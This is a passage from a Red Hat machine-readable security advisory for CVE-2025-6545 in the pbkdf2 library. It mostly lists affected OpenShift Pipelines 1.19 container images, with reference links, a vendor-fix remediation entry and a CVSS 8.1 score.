"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-6545"
},
{
"category": "external",
"summary": "RHBZ#2374370",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2374370"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-6545",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6545"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-6545",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6545"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/commit/9699045c37a07f8319cfb8d44e2ff4252d7a7078",
"url": "https://github.com/browserify/pbkdf2/commit/9699045c37a07f8319cfb8d44e2ff4252d7a7078"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/commit/e3102a8cd4830a3ac85cd0dd011cc002fdde33bb",
"url": "https://github.com/browserify/pbkdf2/commit/e3102a8cd4830a3ac85cd0dd011cc002fdde33bb"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/security/advisories/GHSA-h7cp-r72f-jxh6",
"url": "https://github.com/browserify/pbkdf2/security/advisories/GHSA-h7cp-r72f-jxh6"
}
],
"release_date": "2025-06-23T18:41:18.771000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
